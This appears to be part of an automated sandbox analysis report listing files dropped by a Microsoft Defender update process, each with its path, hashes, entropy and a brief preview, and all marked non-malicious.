Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpScan" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpScan</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Start" />.. <Method MethodName="Start">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="ScanPath">.. <Type PSType="System.String" />.. <CmdletParameterMetadata>.. <ValidateNotNull />.. <ValidateNotNullOrEmpty />.. </CmdletParameterMetadata>.. </Parameter>.. <Parameter ParameterName="ScanType">.. <Type PSType="MpScan.ScanType

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpSignature.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15262
Entropy (8bit):	5.966711820105084
Encrypted:	false
SSDEEP:	384:E6D5YR4l0m6YBOzHQV80tQEFekIqeYQXCSPmTmSI4ElIOhalPvnAS/M0b5hsPDG:B0m6YQzHY80tQjqeYQSSO6SmIZFvnASn
MD5:	A212A25B0FA39ACB5D3F02E1CC622730
SHA1:	77846568863D3AEF5453AEF81C4302DD3F7C87BB
SHA-256:	6A8DC2AA231D974A36E0EC86751139873226D6157232EDB63AFB2AEB110CD8F5
SHA-512:	EBE171D29147429ABD182BE10174FE498EECA6D91D8DB8D9A55511E37C6E42F797A1D80892D95A61A116BCFB73DB99CEB0CC2B3365F0506ABF555E6FE80B7503
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpSignature" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpSignature</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Update" />.. <Method MethodName="Update">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="UpdateSource">.. <Type PSType="MpSignature.UpdateSource" />.. <CmdletParameterMetadata>.. <AllowEmptyString />.. <AllowNull />.. <ValidateNotNull />.. <ValidateNotNullOrEmpty />.. <ValidateSet>.. <AllowedValue>In

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpThreat.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	14872
Entropy (8bit):	5.9567543836192955
Encrypted:	false
SSDEEP:	384:T50m6YBOzHQV80tQEFlS+yB+HzbycVZ1gX5BRpBbpmUBv/:l0m6YQzHY80tQUaWfgBHBoUBv/
MD5:	CF0F8A1D51777BDD9D08FEB023A2162A
SHA1:	47066E1FEB3C61779CC76CB52BE02148FC149CDF
SHA-256:	CFFD2BA2255685803B32ADE8D2D238A07AAEB8071EA04BCBB75CE0EF61FE9AE7
SHA-512:	B49A361319B5EA816C1FABB831C6B43C761427D7913D18E2D94AB4FE181A89394B5ADE044C1E9672FAF7B4B15D73F305CB0A8CFD8965348AD292DFD2257D99A8
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpThreat" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpThreat</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. <QueryableProperties>.. <Property PropertyName="ThreatID">.. <Type PSType="int64" />.. <RegularQuery>.. <CmdletParameterMetadata IsMandatory="false" Aliases="ID".. CmdletParameterSets="ById" />.. </RegularQuery>.. </Property>.. </QueryableProperties>.. </GetCmdletParameters>.. </InstanceCmdlets>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Remov

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpThreatCatalog.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	14359
Entropy (8bit):	5.974349558252268
Encrypted:	false
SSDEEP:	384:K0m6YBOzHQV80tQEFtVSderomWQfUCzuMKqbeUs:K0m6YQzHY80tQaS6omlfUCqMKqVs
MD5:	125B977FF0EE6A36452A2B6FD5AE2316
SHA1:	0C76D5588B36B5A9BFA5F2E3DD64CEA80FB1930D
SHA-256:	7856F35EB7FB72BBF8CAAAC05FD99CEE139F694209BCFBCA41AEB4C3B4CD2413
SHA-512:	9B9E246807F2890B9530197C5EFC8B236C2E11D2B616BE3E6DC813E9F8984197759A77AC73B8D8AF5FF9C13CBB370980B6DDC768281C4E38FF51CACF0D2E2B27
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpThreatCatalog" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpThreatCatalog</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. <QueryableProperties>.. <Property PropertyName="ThreatID">.. <Type PSType="int64" />.. <RegularQuery>.. <CmdletParameterMetadata IsMandatory="false" Aliases="ID".. CmdletParameterSets="ById" />.. </RegularQuery>.. </Property>.. </QueryableProperties>.. </GetCmdletParameters>.. </InstanceCmdlets>.. </Class>..</PowerShellMetadata>.. SIG # Begin signature block -->.. MIIhXAYJKoZIhvcNAQcCoI

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpThreatDetection.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	14398
Entropy (8bit):	5.977177438588654
Encrypted:	false
SSDEEP:	384:M0m6YBOzHQV80tQEFubg1+/pjK02JsuVRqikVcqgyOTx0vz:M0m6YQzHY80tQt3/M02JVWVcqHSxY
MD5:	7C91EEB90EFFB9A8D11DF34FA04FB359
SHA1:	BDFD38D168DBD76C7EC1045B8C15AFD1D6905C74
SHA-256:	97DF56A7933A45143233D314EA947801BF0A475D55A9D852FB411FFD98CB4123
SHA-512:	141BF2F83BE8728B1480469830AD0B7BD3F2E32A1EDF58EA528C26576E0E4BB5510F64B994D6A4C337EB537CB40AC78D3329637184D844BAFF0FC88CA24CF865
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpThreatDetection" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpThreatDetection</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. <QueryableProperties>.. <Property PropertyName="ThreatID">.. <Type PSType="int64" />.. <RegularQuery>.. <CmdletParameterMetadata IsMandatory="false" Aliases="ID".. CmdletParameterSets="ById" />.. </RegularQuery>.. </Property>.. </QueryableProperties>.. </GetCmdletParameters>.. </InstanceCmdlets>.. </Class>..</PowerShellMetadata>.. SIG # Begin signature block -->.. MIIhdwYJKoZIhvcNAQcCoIIhaDCCIW

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpWDOScan.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	14145
Entropy (8bit):	5.978998016086098
Encrypted:	false
SSDEEP:	384:LQ0m6YBOzHQV80tQEFl7Qxh34tSZogX5BRpB6WdGtf/P:80m6YQzHY80tQgQx+t6BHBddGtfH
MD5:	0DB7196D0224FBCE614AD6ACA63F8F17
SHA1:	943B7A55F6E584C9BE421871FD4C9E21A0F326EB
SHA-256:	2D87A0FE031420903AE69DB3A30011DC659B489E2B11AA4129FED01ED3F0B00B
SHA-512:	7F9400BDD7DE5F576F6F776F2C0166EB46A68A0040078993574B8226056E419B9C74B738000AFCEC2CFCDD0A5C5CCE3A822DE19E23FEDD63DF47F85755BA1777
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpWDOScan" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpWDOScan</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Start" />.. <Method MethodName="Start">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue> .. </Method>.. </Cmdlet>.. </StaticCmdlets>.. </Class> ..</PowerShellMetadata>.. SIG # Begin signature block -->.. MIIhXgYJKoZIhvcNAQcCoIIhTzCCIUsCAQExDzANBglghkgBZQMEAgEFADB5Bgor -->.. BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG -->.. KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBzAXdbBfjvkCEN -->.. qK7Ym3r0lwef2vQhN9zidTDdkf

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ProtectionManagement.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	725240
Entropy (8bit):	6.056118316914494
Encrypted:	false
SSDEEP:	12288:UqjFjzbVd9Y5TFXnu5aHOf/gehVtN41D3mRy46WegMZ2:XjzbV7Y5BUlN4t2Ry6Ug
MD5:	0F9485E242400DC47A9FCA73A3443120
SHA1:	1BD457062BE7B37EAA252C238A9B3BF4EFFF0485
SHA-256:	8DA908D6AD4F307D6AAF8CFB1A9C27B3F3A285F84B1F3C817F50D7B154DC575F
SHA-512:	B2A83A997985CC7FC5D07705E49BCC96BD9E0382CD4BB722C4EBBA3B35EE793C6507DA94AF23B276CB0808FEB7233A37A7F72CCF5974AE607186831AA5EE5C10
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................V...........V.....V.....V..J................%..........Rich...........PE..d...O.5..........." .....`.........................................................U<....`A..........................................................X....P...O....... .......F..<...p.......................(.......8...................t........................text...UX.......`.................. ..`.rdata..vI...p...P...p..............@..@.data...T........p..................@....pdata...O...P...P...0..............@..@.didat..............................@....rsrc...X...........................@..@.reloc...F.......P..................@..B................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ProtectionManagement.mof Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	C source, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	91754
Entropy (8bit):	3.59234124916807
Encrypted:	false
SSDEEP:	768:lv7JczQMzhFbvZbY6qyZ+v7JczQMzhFbvZbY6qyZg:RMhWyUMhWya
MD5:	D9619BB89523F47C88DC5FC8BEA50BA0
SHA1:	279098ECBF269FC91585A8D0F7F5A1C72AD2101D
SHA-256:	3ECDCEF5A04C90CA1EB296F3AE4F1C5BC96C371E84BE927C25FA64D6C74C34AF
SHA-512:	F110C9824D5CA8718A4EDA5968DC7DEA7B1C88A498CA2F7706D873D3B6C87FACF8E2ABE7BA20BEF033B8D0322E790C3B0F8CE288166635AE11857B367B9BB9F7
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........I.n.s.t.a.n.c.e. .o.f. ._._.W.i.n.3.2.P.r.o.v.i.d.e.r. .a.s. .$.p.r.o.v.....{..... . .N.a.m.e. .=. .".P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.".;..... . .C.l.s.I.d. .=. .".{.A.7.C.4.5.2.E.F.-.8.E.9.F.-.4.2.E.B.-.9.F.2.B.-.2.4.5.6.1.3.C.A.0.D.C.9.}.".;..... . .I.m.p.e.r.s.o.n.a.t.i.o.n.L.e.v.e.l. .=. .1.;..... . .H.o.s.t.i.n.g.M.o.d.e.l. .=. .".L.o.c.a.l.S.e.r.v.i.c.e.H.o.s.t.".;..... . .v.e.r.s.i.o.n. .=. .1.0.7.3.7.4.1.8.2.5.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.M.e.t.h.o.d.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.E.v.e.n.t.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;..... . .e.v.e.n.t.Q.u.e.r.y.L.i.s.t. .=. .{.".s.e.l.e.c.t. .*. .f.r.o.m. .M.S.F.T._.M.p.E.v.e.n.t.".}.;...

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ProtectionManagement_uninstall.mof Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	C source, Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	2570
Entropy (8bit):	3.4549784303178717
Encrypted:	false
SSDEEP:	24:QXbclfUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvl5:eTjDGwJ3r24RFZ7a2la2Sa2mWaWP
MD5:	72D045707D108D55B76CD70AD9A84AD6
SHA1:	8FE25F4F289302A49CF2FA0F962FEA4D7D82FB8A
SHA-256:	30A0AD834D7B3F4FB47010B4BB6905576792E83064E9DD858EABF0CCA17FC3DF
SHA-512:	E3C6F3F931AEFCF1F0B1061B7355451692AF1F459F8ED13C39B03951A6A3E833AEBB1031796B5D806C615D3E84C178D628B10AB5EC5CCBC50935CBB0D584FA50
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.D.e.t.e.c.t.i.o.n.".,.n.o.f.a.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ThirdPartyNotices.txt Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6717
Entropy (8bit):	5.162252158398129
Encrypted:	false
SSDEEP:	96:+WRspYDLPkQHFom1DW4DlHFposoSKYax9gDCk4Cp1PRsQHdBLe:DaVQHFB0AlHISKYoopoQHdxe
MD5:	CE7313760386B6ABDE405F9B9E6EA51D
SHA1:	F969931AC45991F7ECB6767A69433A7082ECCA2F
SHA-256:	73E26404B3571A9E859B3A1144F54C353172479586E0A23C3A7DDA0C1C0AE919
SHA-512:	CF990FC05FD3ED78FF35F1A1ACD5317626D46745BF7E4F8C62AA068A587ABF52F232080464F82692A2BB8C04A4FFA53599B933A4281BC7E697337720DB65BF29
Malicious:	false
Preview:	===============================================================================..1. C++ REST SDK (https://github.com/Microsoft/cpprestsdk).... C++ REST SDK ....The MIT License (MIT)....Copyright (c) Microsoft Corporation....All rights reserved.....Permission is hereby granted, free of charge, to any person obtaining a copy of..this software and associated documentation files (the "Software"), to deal in..the Software without restriction, including without limitation the rights to..use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of..the Software, and to permit persons to whom the Software is furnished to do so,..subject to the following conditions:....The above copyright notice and this permission notice shall be included in all..copies or substantial portions of the Software.....THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR..IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,..FITNESS FOR A PARTICULAR PURPO

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\af-ZA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	4.969613819843474
Encrypted:	false
SSDEEP:	384:7r/SmH7frhpOJsSYNEYffu1vB+sEqEKSTs/WS8/WWRDBRJZ4UslGsV7:7rbHnZNEYfPDR1PV8
MD5:	2A54A6EFE0D70D2F8120E4F9AE10F2AE
SHA1:	35DD602C81E5E1E086C093BB3C3F97CC68FA2FD6
SHA-256:	F90B4913826DA577A68006FC7211E2390534BE9639934AFC5A375436373B1C71
SHA-512:	8AE2DCEEF670F26A753B1525FD126DC4748A5124B94F5B8ECB632E2A55A2B3C709146C40C936806CCFC64B804A1FF23E31C47293ECD4FF524F5CDC86320D205F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p......*.....@.......................................... ..DN...........T... ...........................................................................................rdata..p...........................@..@.rsrc...DN... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...I...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\am-ET\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22264
Entropy (8bit):	6.043832073272478
Encrypted:	false
SSDEEP:	384:7raKntNfzRKLpPExWUN7W0WVQB82s/BW/pQWS8/W4RDBRJvsl5D2:7r1ntNfzRKLpcjfRxR1Pl
MD5:	F5F731716CA6C6CEFF57DEE03EB33376
SHA1:	FA71CD3569AD3C6518E626E09965053F58AB6D9D
SHA-256:	A2E33041860906CEF0BCE5B2F3FD2AF88E3DB61E97FF9EB16D650CAD1F69F708
SHA-512:	FCCD58F3A698CE9668322C76140E8FE55B2F484962D1A9B51828C00C3CD888D85EA83D3626993B50098271B250DDE6783FA129E5225153112781D5565313553F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........4...............................................`............@.......................................... ...1...........6... ...........................................................................................rdata..p...........................@..@.rsrc....1... ...2..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...-...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ar-SA\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58600
Entropy (8bit):	4.802281589367443
Encrypted:	false
SSDEEP:	768:7r+0QI4V/O4klevfq7mvqaI216icZKfEflxZFcR1Pga1zR3:qCcHPVZ
MD5:	628870D988EFBFC39C06E7BA62495FFE
SHA1:	A3A302666A07A5FE0D7FAD69DE9B1AFBD8F91536
SHA-256:	161D58719676884DB3BDFEA9A5770A55EC7BEBE839D97B6ECA3D20EC5A3D6B2D
SHA-512:	E04ECDC7226C9B18FC86F51F6B70CD6E13345C8F2A8DFEE0845350777580CF46A738271E949B07216D83A647685DAD3666A7F5C2BA36451E11DB1545AFD9F7E9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................:2....@.......................................... ..X................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ar-SA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	25320
Entropy (8bit):	5.568099766445783
Encrypted:	false
SSDEEP:	384:7r8teWannr4pG2RI96HUy/oV/m9HlCWS8/WWRDBRJWiZEQmDWlGszRo:7r5nnr4pG2RI9AoV+9HVbR1PWJ1zv
MD5:	53F858DC25ADF3684E7E025277A57023
SHA1:	A51A05FFA31010C1B28A63B5B7BBB490239BC1C6
SHA-256:	D57524C7B0D7FE779DC3803F041C341F818381E19703D32BAA988F1697D1175C
SHA-512:	0A7E6808CDB2EB6E31596218FE42B2BFEE9B067B22913D43A1E1C1D5B1832C3018B04FC633E8F9223378216372235988FE15F2D9FA074AC595046542FF54B9D1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........@...............................................`............@.......................................... ...>...........B... ...........................................................................................rdata..p...........................@..@.rsrc....>... ...>..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..H9...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\as-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29416
Entropy (8bit):	5.632188784867651
Encrypted:	false
SSDEEP:	768:7rOPaPbPAPCPLTPnPWPkP8Pe1lOO6FD6kKOy6OQOQ4LuYz3KUrZPk/4hPrPDV86/:xcNgPHPwc
MD5:	D359F26A958650D3B5A28495DC39D409
SHA1:	3EF8B8E1C4E876E1C2A6157AE92C65E629C7559C
SHA-256:	F2A33F57BED6013E9850AB150C83577862DE7FADA3CAA1C87C94100F486D92A7
SHA-512:	0ED71E0EA79B7AA96E8358B28DDE2C7C419C526168271355AA73C281BB123E9306FE1F3A94A1A9A7BBD4234E54CB0760BA31D6BBF5E13BEB8305460000C3685D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........P...............................................p............@.......................................... ...L...........R... ...........................................................................................rdata..p...........................@..@.rsrc....L... ...N..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..(H...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\az-Latn-AZ\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28904
Entropy (8bit):	5.231249488030954
Encrypted:	false
SSDEEP:	768:7rOj1wdJ4v3YFcFqFkFJFgFGFYFhrVbFRdtR1Pl/DM2:Gj1gFcFqFkFJFgFGFYFlVbFbtHPl/w2
MD5:	06A297C9B8293DA4AC3B56D304874F2A
SHA1:	A7B7F072E7A7A5837382293CD65ABF10088E6EA9
SHA-256:	C5D1763D4F042FE777BB02E47E26F76EC9008AF689679BDA6480E1541A1158BF
SHA-512:	AB2C0EACEE65A2CC104DE75C86311374227E3E91E8BCEBED89F729B07681E2A79D88BC73F507C471666FCE8753DC18E83C2C37B27D8088D1563EC8634B05EBD8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........N...............................................p............@.......................................... ...K...........P... ...........................................................................................rdata..p...........................@..@.rsrc....K... ...L..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...F...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\bg-BG\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64744
Entropy (8bit):	4.650844920332313
Encrypted:	false
SSDEEP:	384:7rTz3pDQHT+ddcOc1jzG/by+psEV++OfYcYQIhJ2YIqqO7a1BQdWhjRDBRJ4NKgY:7rtuDOYz01TO29VqhQ4jR1P4tl51VQ
MD5:	DDFB72494C7DAB2C2DCBBF58F1384BB8
SHA1:	474F7CDEDFEF2B0E5765B5EF151A8DEA7845BE68
SHA-256:	7E28FA6FC9DD05652F3DDCC4B9BC54469DD44995EC69EF149B9477B4C0CE53D6
SHA-512:	6AD3EBF149C1C9A5BE7FF012A2AEE38DD6D2EFADE2EE73E1F41E45393180DA13BB1FB8E079E6D8CBE5D51259A1D57351738D037A3589FF50CF7577C372A1C521
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................H....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

